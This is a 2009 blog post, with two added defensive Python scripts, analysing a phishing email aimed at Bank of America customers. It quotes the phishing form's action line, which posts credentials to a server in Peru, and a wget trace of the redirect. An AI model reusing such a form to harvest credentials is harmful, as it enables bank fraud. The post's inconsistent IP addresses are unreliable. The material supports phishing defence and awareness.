Sunday, October 04, 2009
How Many People Will Fall for this Phish Email?
I received this in my inbox tonight. I wonder how many people will fall for this ruse? If you look, it seems to come from support.com. Likely support.com's email server was used as a relay. This is support.com:
Administrative Contact, Technical Contact:
Vatturi, Sujan Sujan.Vatturi@support.com
1900 Seaport Blvd
Redwood CIty, CA 94063
Any real email would come from a Bank of America address, and they would not have you fill out a form to send them via email or post via the World Wide Web unless you were a business account. (Yes, business-to-business transactions are a lot more lax. You'd think the security would be tighter, but it's actually almost nonexistent in many instances.) I generally don't comment about these things, but these scams are becoming so common, and banks are losing people's money to them with greater frequency, yet no one knows the losses. What's worse is that your helpful Windows computer may be the link in the chain that allows some bad guy to rob your bank account some day. I don't use Windows for any banking transactions, and I've had one credit card account compromised this year, which means that either a merchant I've used, the bank that issued the credit card, or the company handling credit card transactions had its systems compromised. My guess is the latter, since I didn't use that card for very many purchases.
But back to the scam at hand, buried in the web form they have you download is this bit:
...="Ps" action="http://220.127.116.11/services/bofa.php" method="post"
18.104.22.168 is in Lima, Peru.
IP Telefonica del Peru
Calle San Felipe 1144, 1144,
LI34 - Lima - LI
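A defender-side check for the trick in the form fragment above, as an added example that is not the post's own code: parse the HTML attachment and flag every form whose action posts to a host other than the bank's own, to a raw IP literal, or over plain http. The sample HTML and the expected-host list are constructed for this example; the IP literal is the one shown in the fragment.

```python
"""Flag HTML forms whose action posts somewhere other than the expected site.

Added example, not code from the original post. The sample HTML below is
constructed; the IP literal in it is the one shown in the post's form fragment.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts a genuine form on the bank's pages would be allowed to post to (assumption).
EXPECTED_HOSTS = {"bankofamerica.com", "www.bankofamerica.com"}

# Constructed sample: the phishing form from the post plus a harmless one.
SAMPLE_HTML = """
<html><body>
<form name="Ps" action="http://220.127.116.11/services/bofa.php" method="post">
  <input name="acct"><input name="pin" type="password">
</form>
<form action="https://www.bankofamerica.com/search" method="get"><input name="q"></form>
</body></html>
"""


class FormActionCollector(HTMLParser):
    """Collect the action and method attributes of every <form> element."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "form":
            return
        a = dict(attrs)  # attribute names arrive lowercased; values may be None
        self.forms.append({
            "action": a.get("action") or "",
            "method": (a.get("method") or "get").lower(),
        })


def is_ip_literal(host):
    """True when the host part of a URL is a bare IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def audit_forms(html, expected_hosts=EXPECTED_HOSTS):
    """Return one finding per form, listing the reasons it looks suspicious.

    A relative action (no host) is left alone: it posts back to the page origin.
    """
    parser = FormActionCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        parts = urlsplit(form["action"])
        host = (parts.hostname or "").lower()
        reasons = []
        if host and host not in expected_hosts:
            reasons.append("posts to unexpected host %s" % host)
        if is_ip_literal(host):
            reasons.append("action uses a raw IP literal")
        if parts.scheme == "http":
            reasons.append("plain http, credentials sent in the clear")
        findings.append({"action": form["action"], "method": form["method"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_forms(SAMPLE_HTML):
        print(f["method"].upper(), f["action"], "->", "; ".join(f["reasons"]) or "ok")
```

The same parser can be run over a whole mailbox of attachments; the useful signal is a POST target that is not the brand's own domain, and a raw IP literal in the action is almost never legitimate for a bank.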
So, you are submitting your information to a server in Peru, but when you connect to it, it immediately redirects your browser to Bank of America:
wget -c http://22.214.171.124/services/bofa.php
--2009-10-04 23:57:42-- http://126.96.36.199/services/bofa.php
Connecting to 188.8.131.52:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.bankofamerica.com/state.cgi?section=generic&update=&cookiecheck=yes&context=&override_debug_mode=DEBUG&template=rv_loans&type=&destination=nba/vehicle_and_personal_loans/index.cfm?adlink= [following]
--2009-10-04 23:57:42-- http://www.bankofamerica.com/state.cgi?section=generic&update=&cookiecheck=yes&context=&override_debug_mode=DEBUG&template=rv_loans&type=&destination=nba/vehicle_and_personal_loans/index.cfm?adlink=
Resolving www.bankofamerica.com... 184.108.40.206
Connecting to www.bankofamerica.com|220.127.116.11|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
The 302 code is an HTTP redirect. They don't want their site indexed by search engines, because that is the easiest way to find them and shut them down. However, if Bank of America were clever, they would correlate the IP addresses of customers reaching their web server by redirection from 18.104.22.168 to gain a rough idea of who is being fooled. They should also file a complaint with that Peruvian telecom to have the server shut down. But all the customer sees is the following web page, while the bad guys abscond with the financial information the customers have handed over.
[Screenshot: Redirection to Bank of America from Peruvian server]
Pretty clever, huh? It's an easy way to make a living for someone in a poor country. And, it costs all of us money in the form of bank fees.
Labels: Crappy IT Security
Also Nigeria is sending a few, along with most countries of central Africa. Or it could be Western con artists faking the African country origin.
Something that the NSA/FBI could combat and flatten (with anti-fake programs), I hope.
The way to stop it is multifold:
1. Educate your customers.
2. Monitor customer accounts the way credit card accounts are monitored, on a transaction basis (Schneier's proposal).
3. Make banks liable for all losses of this kind (Schneier's and others' proposal).
4. Prevent redirections to your site from people who are not your business partners, vendors, or the government. This could be done at the DNS, router, proxy, or firewall, but not easily. Chances are, though, that the company knows who it does business with overseas, so it can block all other access from overseas networks that isn't legitimate.
5. Fix international laws allowing the extradition of criminals for international wire fraud and bank theft.
Modern bank robbers now rob the bank either by owning it, or robbing the customers via deception or malware. Either method is effective and the chances of getting caught are slim to none.
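The correlation the post suggests (customers arriving at the bank's server by way of the Peruvian redirect) and item 4 of the list above, as an added example rather than anything the bank or the post's author actually runs: scan the bank's own web-server access log for visitors who arrive from a host outside an allowlist of expected referrers, or who request the exact landing URL the Peruvian server's 302 points at. The allowlist, the partner host name and the log lines are constructed assumptions. Whether a redirected browser carries a Referer header at all depends on the browser and on how the form was opened (a form saved from an email and opened locally typically sends none), so the landing-URL match is the fallback signal when the Referer is empty.

```python
"""Correlate web-server hits with the phishing redirect described in the post.

Added example, not the bank's or the post author's code. Assumes the server
writes combined-format logs (with the Referer field) and that the phishing
server's 302 sends victims to the distinctive landing URL from the post's
wget output. All log lines below are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Hosts visitors are expected to arrive from: the bank's own sites plus known
# partners (assumption; "partner.example" is a placeholder).
ALLOWED_REFERER_HOSTS = {"bankofamerica.com", "www.bankofamerica.com", "partner.example"}

# Path and query the Peruvian server's 302 pointed at (from the post's wget output).
LANDING_URL = ("/state.cgi?section=generic&update=&cookiecheck=yes&context=&"
               "override_debug_mode=DEBUG&template=rv_loans&type=&"
               "destination=nba/vehicle_and_personal_loans/index.cfm?adlink=")

# Apache/nginx combined log format: ip ident user [time] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: one visitor redirected with a Referer from the phishing
# host, one redirected with no Referer, one ordinary customer request, and
# one arrival from a partner site.
LOG_LINES = [
    ('203.0.113.7 - - [04/Oct/2009:23:58:01 -0400] "GET %s HTTP/1.1" 200 5120 '
     '"http://18.104.22.168/services/bofa.php" "Mozilla/5.0"') % LANDING_URL,
    '203.0.113.7 - - [04/Oct/2009:23:58:09 -0400] "GET /login HTTP/1.1" 200 2200 '
    '"https://www.bankofamerica.com/" "Mozilla/5.0"',
    ('198.51.100.9 - - [05/Oct/2009:00:02:44 -0400] "GET %s HTTP/1.1" 200 5120 '
     '"-" "Mozilla/5.0"') % LANDING_URL,
    '192.0.2.5 - - [05/Oct/2009:00:03:10 -0400] "GET /index.html HTTP/1.1" 200 700 '
    '"https://partner.example/link" "Mozilla/5.0"',
]


def correlate(lines, allowed=ALLOWED_REFERER_HOSTS, landing_url=LANDING_URL):
    """Return {client_ip: sorted reasons} for hits that look like redirected victims."""
    suspects = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        rec = m.groupdict()
        # "-" in the referer field means the header was absent; hostname is then None
        referer_host = (urlsplit(rec["referer"]).hostname or "").lower()
        if referer_host and referer_host not in allowed:
            suspects[rec["ip"]].add("referred by unexpected host " + referer_host)
        if rec["url"] == landing_url:
            reason = "requested the redirect's landing URL"
            if not referer_host:
                reason += " with no Referer"
            suspects[rec["ip"]].add(reason)
    return {ip: sorted(reasons) for ip, reasons in suspects.items()}


if __name__ == "__main__":
    for ip, reasons in correlate(LOG_LINES).items():
        print(ip, "->", "; ".join(reasons))
```

In practice the output feeds an alert rather than a block: the unexpected-referrer rule is the item-4 control, and the set of client IPs it produces is the rough victim list the post says the bank could build, which is then useful for outreach to those customers and for the abuse complaint to the hosting provider.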